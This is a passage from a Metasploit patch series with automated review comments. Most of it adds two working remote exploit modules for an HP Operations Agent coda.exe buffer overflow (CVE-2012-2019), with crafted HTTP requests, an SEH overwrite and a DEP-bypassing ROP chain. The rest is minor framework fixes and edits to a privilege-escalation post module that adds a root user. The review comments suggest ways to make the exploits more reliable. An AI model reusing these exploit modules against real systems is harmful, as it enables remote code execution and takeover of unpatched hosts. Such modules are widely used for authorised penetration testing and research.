Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + + end + + def ping + + ping_request = <<-eos +Ping /Hewlett-Packard/OpenView/BBC/ping/ HTTP/1.1 +cache-control: no-cache +connection: close +content-length: 0 +content-type: application/octetstream +date: Tue, 16 Oct 2012 20:30:17 GMT +host: #{rhost}:#{rport} +pragma: no-cache +senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 +targetid: unknown +targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/ +user-agent: BBC 11.00.044; coda unknown version + + eos + + connect + sock.put(ping_request) + res = 
sock.get_once(-1, 1) + disconnect + + return res + + end + + def exploit + + peer = "#{rhost}:#{rport}" + + print_status "#{peer} - Ping host..." + res = ping + if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ + print_error("#{peer} - Host didn't answer correctly to ping") + return + end + + connect + + http_headers = <<-eos +GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1 +cache-control: no-cache +content-type: application/octetstream +date: Tue, 16 Oct 2012 20:30:29 GMT +expect: 100-continue +host: #{rhost}:#{rport} +pragma: no-cache +senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 +targetid: unknown +targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/ +transfer-encoding: chunked +user-agent: BBC 11.00.044; 14 + + eos + + print_status("#{peer} - Sending HTTP Expect...") + sock.put(http_headers) + res = sock.get_once(-1, 1) + if not res or res !~ /HTTP\/1\.1 100 Continue/ + print_error("#{peer} - Failed while sending HTTP Expect Header") + return + end + + coda_request = [ + 0x0000000e, + 0xffffffff, + 0x00000000, + 0x0000008c, # Operation 0x8c + 0x00000002, + 0x00000002 + ].pack("N*") + + if target.name =~ /Windows XP/ + bof = rand_text(target['Offset']) + bof << generate_seh_record(target.ret) + bof << payload.encoded + bof << rand_text(4000) # Allows to trigger exception + else # Windows 2003 + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # 
RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + bof = Rex::Text.pattern_create(target['RopOffset']) + bof << rop_gadgets + bof << payload.encoded + my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + bof << rand_text(target['Offset'] - my_payload_length) + bof << generate_seh_record(target.ret) + bof << rand_text(4000) # Allows to trigger exception + end + + coda_request << [bof.length].pack("n") + coda_request << bof + + http_body = coda_request.length.to_s(16) + http_body << "\x0d\x0a" + http_body << coda_request + http_body << "\x0d\x0a\x0d\x0a" + + print_status("#{peer} - Triggering overflow...") + sock.put(http_body) + + disconnect + end + +end From 51bc8060142294485a4908e20cd96de3ce7098c6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 27 Oct 2012 22:45:37 +0200 Subject: [PATCH 59/74] Added module for CVE-2012-2019 --- .../misc/hp_operations_agent_coda_34.rb | 239 ++++++++++++++++++ 1 file changed, 239 insertions(+) create mode 100644 modules/exploits/windows/misc/hp_operations_agent_coda_34.rb diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb new file mode 100644 index 0000000000..171971c237 --- /dev/null +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb 
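Review bot: In exploit, the early `return` after `print_error("#{peer} - Failed while sending HTTP Expect Header")` leaves the socket opened by the preceding `connect` in place; `ping` closes its own socket on every path, so this one should too with a `disconnect` before the `return`, unless the framework's cleanup hook is being relied on to close it. A smaller nit in check: `/server:.*coda 11.(\d+)/` has an unescaped dot, so `coda 11x00` would also match; `/server:.*coda 11\.(\d+)/` says what is meant, and the `minor < 2` cut-off deserves a comment naming the fixed version it encodes, since nothing in the module states it. The 1-second `sock.get_once(-1, 1)` in both ping and exploit may also make check report Unknown on slow links; that is a tuning call rather than a defect.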
@@ -0,0 +1,239 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize + super( + 'Name' => 'HP Operations Agent Opcode 0x8c Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in HP Operations Agent for + Windows. The vulnerability exists in the HP Software Performance Core Program + component (coda.exe) when parsing requests for the 0x34 opcode. This module has + been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and + Windows 2003 SP2 (DEP bypass). + + The coda.exe components runs only for localhost by default, network access must be + granted through its configuration to be remotely exploitable. On the other hand it + runs on a random TCP port, to make easier reconnaissance a check function is + provided. 
+ }, + 'Author' => [ + 'Luigi Auriemma', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2012-2019' ], + [ 'OSVDB', '83673' ], + [ 'BID', '54362' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-114/' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500 + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'HP Operations Agent 11.00 / Windows XP SP3', + { + 'Ret' => 0x100e79eb, # ppr from OvSecCore.dll + 'Offset' => 2084 + } + ], + [ 'HP Operations Agent 11.00 / Windows 2003 SP2', + { + 'Ret' => 0x10073c2c, # stackpivot # ADD ESP,404 # RETN from OvSecCore.dll + 'Offset' => 2084, + 'RopOffset' => 36 + } + ] + ], + 'DefaultTarget' => 1, + 'Privileged' => true, + 'DisclosureDate' => 'Jul 09 2012' + ) + + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def check + + res = ping + + if not res + return Exploit::CheckCode::Unknown + end + + if res !~ /HTTP\/1\.1 200 OK/ + return Exploit::CheckCode::Unknown + end + + if res =~ /server:.*coda 11.(\d+)/ + minor = $1.to_i + if minor < 2 + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + if res =~ /server:.*coda/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + + end + + def ping + + ping_request = <<-eos +Ping /Hewlett-Packard/OpenView/BBC/ping/ HTTP/1.1 +cache-control: no-cache +connection: close +content-length: 0 +content-type: application/octetstream +date: Tue, 16 Oct 2012 20:30:17 GMT +host: #{rhost}:#{rport} +pragma: no-cache +senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 +targetid: unknown +targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/ +user-agent: BBC 11.00.044; coda unknown version + + eos + + connect + sock.put(ping_request) + res = 
sock.get_once(-1, 1) + disconnect + + return res + + end + + def exploit + + peer = "#{rhost}:#{rport}" + + print_status "#{peer} - Ping host..." + res = ping + if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ + print_error("#{peer} - Host didn't answer correctly to ping") + return + end + + connect + + http_headers = <<-eos +GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1 +cache-control: no-cache +content-type: application/octetstream +date: Tue, 16 Oct 2012 20:30:29 GMT +expect: 100-continue +host: #{rhost}:#{rport} +pragma: no-cache +senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 +targetid: unknown +targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/ +transfer-encoding: chunked +user-agent: BBC 11.00.044; 14 + + eos + + print_status("#{peer} - Sending HTTP Expect...") + sock.put(http_headers) + res = sock.get_once(-1, 1) + if not res or res !~ /HTTP\/1\.1 100 Continue/ + print_error("#{peer} - Failed while sending HTTP Expect Header") + return + end + + coda_request = [ + 0x0000000e, + 0xffffffff, + 0x00000000, + 0x00000034, # Operation 0x8c + 0x00000002, + 0x00000002 + ].pack("N*") + + if target.name =~ /Windows XP/ + bof = rand_text(target['Offset']) + bof << generate_seh_record(target.ret) + bof << payload.encoded + bof << rand_text(4000) # Allows to trigger exception + else # Windows 2003 + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # 
RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + bof = Rex::Text.pattern_create(target['RopOffset']) + bof << rop_gadgets + bof << payload.encoded + my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + bof << rand_text(target['Offset'] - my_payload_length) + bof << generate_seh_record(target.ret) + bof << rand_text(4000) # Allows to trigger exception + end + + coda_request << [bof.length].pack("n") + coda_request << bof + + http_body = coda_request.length.to_s(16) + http_body << "\x0d\x0a" + http_body << coda_request + http_body << "\x0d\x0a\x0d\x0a" + + print_status("#{peer} - Triggering overflow...") + sock.put(http_body) + + disconnect + end + +end \ No newline at end of file From 3efa4186df07d6a5d4b9f8bd367723905e062f42 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Sat, 27 Oct 2012 16:15:04 -0500 Subject: [PATCH 60/74] Fix search error when platform not in target name --- lib/msf/core/db_manager.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 52bbafa7de..0f68a03c21 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -588,8 +588,8 @@ class DBManager where_v << [ xv, xv ] when 'os','platform' xv = "%#{kv}%" - where_q << ' ( module_targets.name ILIKE ? ) ' - where_v << [ xv ] + where_q << ' ( module_platforms.name ILIKE ? OR module_targets.name ILIKE ? ) ' + where_v << [ xv, xv ] when 'port' # TODO when 'type' From b4b1b77a775d6e4654f040b6c320de1a978cbb7e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 28 Oct 2012 00:51:18 +0200 Subject: [PATCH 61/74] deleted unnecessary http headers according to my tests --- modules/exploits/windows/misc/hp_operations_agent_coda_34.rb | 4 ---- 1 file changed, 4 deletions(-) 
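Review bot: The opcode word is annotated `0x00000034, # Operation 0x8c`, a leftover from the 0x8c module this file was copied from, and it mislabels the one material difference between the two modules; it should read `0x00000034, # Operation 0x34`. The same missing `disconnect` before the `return` after the failed Expect check applies here as in the 0x8c module, since that code is identical, and the same unescaped dot in check's `/server:.*coda 11.(\d+)/` is carried over.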
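Review bot: The new predicate references `module_platforms.name`, which only works if the query's FROM/JOIN list already brings in module_platforms; the joins are built outside this hunk, so if that table is not joined for every search path this raises a SQL error instead of returning no rows, and a `search platform:linux` against a populated database is the cheap check. Separately, `xv = "%#{kv}%"` is bound as a parameter, so there is no injection, but `%` and `_` in the user's term are LIKE metacharacters and pass through unescaped; that matches the existing branches and can be left as is or fixed file-wide.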
diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 171971c237..2b3c46e0e1 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -115,10 +115,8 @@ cache-control: no-cache connection: close content-length: 0 content-type: application/octetstream -date: Tue, 16 Oct 2012 20:30:17 GMT host: #{rhost}:#{rport} pragma: no-cache -senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 targetid: unknown targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/ user-agent: BBC 11.00.044; coda unknown version @@ -151,11 +149,9 @@ user-agent: BBC 11.00.044; coda unknown version GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1 cache-control: no-cache content-type: application/octetstream -date: Tue, 16 Oct 2012 20:30:29 GMT expect: 100-continue host: #{rhost}:#{rport} pragma: no-cache -senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 targetid: unknown targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/ transfer-encoding: chunked From 73deeacd7e9e4e0b18876310cd9a9e410cfb754a Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 28 Oct 2012 00:52:52 +0200 Subject: [PATCH 62/74] deleted unnecessary http headers according to my tests --- modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index 461e99b0e2..cf94b68377 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb 
@@ -115,10 +115,8 @@ cache-control: no-cache connection: close content-length: 0 content-type: application/octetstream -date: Tue, 16 Oct 2012 20:30:17 GMT host: #{rhost}:#{rport} pragma: no-cache -senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 targetid: unknown targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/ user-agent: BBC 11.00.044; coda unknown version @@ -151,11 +149,9 @@ user-agent: BBC 11.00.044; coda unknown version GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1 cache-control: no-cache content-type: application/octetstream -date: Tue, 16 Oct 2012 20:30:29 GMT expect: 100-continue host: #{rhost}:#{rport} pragma: no-cache -senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 targetid: unknown targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/ transfer-encoding: chunked From 19920b3275b68c970a33fb173baffd95d675dd12 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 28 Oct 2012 02:38:39 +0100 Subject: [PATCH 63/74] update module titles for hp operation agent vulns --- modules/exploits/windows/misc/hp_operations_agent_coda_34.rb | 2 +- modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 2b3c46e0e1..f87c4615e9 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( - 'Name' => 'HP Operations Agent Opcode 0x8c Buffer Overflow', + 'Name' => 'HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program 
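Review bot: The new title `'HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow'` puts the binary name between "Opcode" and its value, which reads as garbled; `'HP Operations Agent coda.exe Opcode 0x34 Buffer Overflow'` keeps the same words in the order someone searching for them would expect. The 0x8c module's title in the following hunk has the same ordering and should be changed together with it.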
diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index cf94b68377..152836b2e4 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( - 'Name' => 'HP Operations Agent Opcode 0x8c Buffer Overflow', + 'Name' => 'HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program From 6ec392c4cf79b402347709ba3ed8dd7e98963e89 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 28 Oct 2012 23:49:21 -0500 Subject: [PATCH 64/74] Add Rex::Text.sha1 and Rex::Text.sha1_raw --- lib/rex/text.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 1ce4943202..bccc7c9f96 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'digest/md5' +require 'digest/sha1' require 'stringio' begin @@ -812,6 +813,20 @@ module Text Digest::MD5.hexdigest(str) end + # + # Raw SHA1 digest of the supplied string + # + def self.sha1_raw(str) + Digest::SHA1.digest(str) + end + + # + # Hexidecimal SHA1 digest of the supplied string + # + def self.sha1(str) + Digest::SHA1.hexdigest(str) + end + # # Convert hex-encoded characters to literals. # Example: "AA\\x42CC" becomes "AABCC" From ac90d217259bc3aeb91e4029b126a2b268c67230 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 08:27:22 -0500 Subject: [PATCH 65/74] Msftidy checks for file loads --- tools/msftidy.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index cdcf95aea8..505fb15855 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb 
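Review bot: The doc comments for the new helpers say only "Raw SHA1 digest" / "Hexidecimal SHA1 digest", `Hexidecimal` is misspelled, and since this is a shared library the comment should tell callers what the digest is fit for. Suggested: `# Raw SHA1 digest of the supplied string. SHA1 is fine for fingerprints and lookup keys but is not collision resistant; do not use it where an attacker could benefit from a collision (use a SHA-2 digest there).` and `# Hexadecimal SHA1 digest of the supplied string (same caveat as sha1_raw).`. The surrounding module continues on both sides of the hunk.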
@@ -208,6 +208,11 @@ class Msftidy end end + # if ln =~/^[ \t]+load[ \t]+.*?\.rb/ + if ln =~/^[ \t]*load[ \t]+[\x22\x27]/ + error("Loading (not requiring) a file: #{ln.inspect}", idx) + end + # The rest of these only count if it's not a comment line next if ln =~ /[[:space:]]*#/ From bd0352de1993b339ad9c6aeccf730ed5817c773a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 08:33:01 -0500 Subject: [PATCH 66/74] Delete comment --- tools/msftidy.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 505fb15855..e630ea2c8b 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -208,7 +208,6 @@ class Msftidy end end - # if ln =~/^[ \t]+load[ \t]+.*?\.rb/ if ln =~/^[ \t]*load[ \t]+[\x22\x27]/ error("Loading (not requiring) a file: #{ln.inspect}", idx) end From 0e3bc7d060d405766274ef30ba77bac223fc4b72 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 29 Oct 2012 15:45:40 +0100 Subject: [PATCH 67/74] hp operations agent mods: fix use of pattern_create, use ropdb --- .../misc/hp_operations_agent_coda_34.rb | 36 +++---------------- .../misc/hp_operations_agent_coda_8c.rb | 36 +++---------------- 2 files changed, 10 insertions(+), 62 deletions(-) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index f87c4615e9..b0bbfffef4 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + include Msf::Exploit::RopDb def initialize super( 
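Review bot: The new check `if ln =~/^[ \t]*load[ \t]+[\x22\x27]/` only catches `load` followed by whitespace and a quote, so `load(` with parentheses or `load File.join(...)` slip past it, and the pcap_log module earlier in this series would have passed had it been written either way. `if ln =~ /^[ \t]*load[ \t(]/` covers those forms at the cost of a false positive on a local variable literally named load, which `and ln !~ /^[ \t]*load[ \t]*=/` excludes. A space after `=~` would also match the other regex tests in this file.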
@@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14 bof << payload.encoded bof << rand_text(4000) # Allows to trigger exception else # Windows 2003 - rop_gadgets = - [ - 0x77bb2563, # POP EAX # RETN - 0x77ba1114, # <- *&VirtualProtect() - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77bb0c86, # XCHG EAX,ESI # RETN - 0x77bc9801, # POP EBP # RETN - 0x77be2265, # ptr to 'push esp # ret' - 0x77bb2563, # POP EAX # RETN - 0x03C0990F, - 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) - 0x77bb48d3, # POP EBX, RET - 0x77bf21e0, # .data - 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN - 0x77bbfc02, # POP ECX # RETN - 0x77bef001, # W pointer (lpOldProtect) (-> ecx) - 0x77bd8c04, # POP EDI # RETN - 0x77bd8c05, # ROP NOP (-> edi) - 0x77bb2563, # POP EAX # RETN - 0x03c0984f, - 0x77bdd441, # SUB EAX, 03c0940f - 0x77bb8285, # XCHG EAX,EDX # RETN - 0x77bb2563, # POP EAX # RETN - nop, - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") - bof = Rex::Text.pattern_create(target['RopOffset']) - bof << rop_gadgets - bof << payload.encoded - my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'}) + bof = rand_text(target['RopOffset']) + bof << rop_payload + my_payload_length = target['RopOffset'] + rop_payload.length bof << rand_text(target['Offset'] - my_payload_length) bof << generate_seh_record(target.ret) bof << rand_text(4000) # Allows to trigger exception diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index 152836b2e4..23160eb4e0 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb 
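Review bot: `rand_text(target['Offset'] - my_payload_length)` has no guard, and with the chain now coming from the msvcrt RopDb entry its length is no longer fixed in this file; if `RopOffset` + chain + `payload.encoded` ever exceeds the 2084-byte `Offset`, the subtraction goes negative and the SEH record lands in the wrong place with no diagnostic. A check right after the length is computed makes that explicit: `if my_payload_length > target['Offset']` / `print_error("#{peer} - ROP chain plus payload too large (#{my_payload_length} > #{target['Offset']})")` / `disconnect; return`. If the `junk` and `nop` helpers defined earlier in the module were only used by the removed hand-rolled chain, they are now dead code and can go. The exploit method starts and ends outside the hunk.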
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + include Msf::Exploit::RopDb def initialize super( @@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14 bof << payload.encoded bof << rand_text(4000) # Allows to trigger exception else # Windows 2003 - rop_gadgets = - [ - 0x77bb2563, # POP EAX # RETN - 0x77ba1114, # <- *&VirtualProtect() - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77bb0c86, # XCHG EAX,ESI # RETN - 0x77bc9801, # POP EBP # RETN - 0x77be2265, # ptr to 'push esp # ret' - 0x77bb2563, # POP EAX # RETN - 0x03C0990F, - 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) - 0x77bb48d3, # POP EBX, RET - 0x77bf21e0, # .data - 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN - 0x77bbfc02, # POP ECX # RETN - 0x77bef001, # W pointer (lpOldProtect) (-> ecx) - 0x77bd8c04, # POP EDI # RETN - 0x77bd8c05, # ROP NOP (-> edi) - 0x77bb2563, # POP EAX # RETN - 0x03c0984f, - 0x77bdd441, # SUB EAX, 03c0940f - 0x77bb8285, # XCHG EAX,EDX # RETN - 0x77bb2563, # POP EAX # RETN - nop, - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") - bof = Rex::Text.pattern_create(target['RopOffset']) - bof << rop_gadgets - bof << payload.encoded - my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'}) + bof = rand_text(target['RopOffset']) + bof << rop_payload + my_payload_length = target['RopOffset'] + rop_payload.length bof << rand_text(target['Offset'] - my_payload_length) bof << generate_seh_record(target.ret) bof << rand_text(4000) # Allows to trigger exception From 5e80e19a4ec59f26f8d0c2c963a665b9b8d2e2f5 Mon Sep 17 00:00:00 2001 
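Review bot: As in the 0x34 module, `rand_text(target['Offset'] - my_payload_length)` is unguarded now that the chain length depends on the RopDb entry rather than a fixed array in this file, so an oversized chain or payload goes negative silently; add `if my_payload_length > target['Offset']` / `print_error("#{peer} - ROP chain plus payload too large (#{my_payload_length} > #{target['Offset']})")` / `disconnect; return` after the length is computed. The `junk` and `nop` helpers are presumably unreferenced after this change and can be removed if so. The exploit method starts and ends outside the hunk.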
From: Tod Beardsley Date: Mon, 29 Oct 2012 11:08:03 -0500 Subject: [PATCH 68/74] Msftidy complaint about EOL spaces --- modules/post/multi/escalate/metasploit_pcaplog.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 64cdea7f19..3ce5ff4189 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post 'References' => [ [ 'BID', '54472' ], - [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], + [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ], ], 'DisclosureDate' => "Jul 16 2012", @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post } )) register_options( - [ + [ Opt::RPORT(2940), OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]), 
@@ -98,13 +98,13 @@ class Metasploit3 < Msf::Post i = (i+1) % 60 # increment second counter end - if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") + if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") # TODO: Consider recording our now-created username and password as a valid credential here. else - print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") - end + print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") + end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload - # However beceause the session is not a terminal, su will not always allow this. + # However beceause the session is not a terminal, su will not always allow this. end end From 65e27ff38a614459b31fcacd7540c26aa06ec5da Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 11:22:06 -0500 Subject: [PATCH 69/74] Warn about the potential to jack up /etc/passwd This needs to be underlined. It's too easy to wang up /etc/passwd by accident. This closes PR #632 [Fixes #38593685] --- modules/post/multi/escalate/metasploit_pcaplog.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 3ce5ff4189..0e02a311e8 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb 
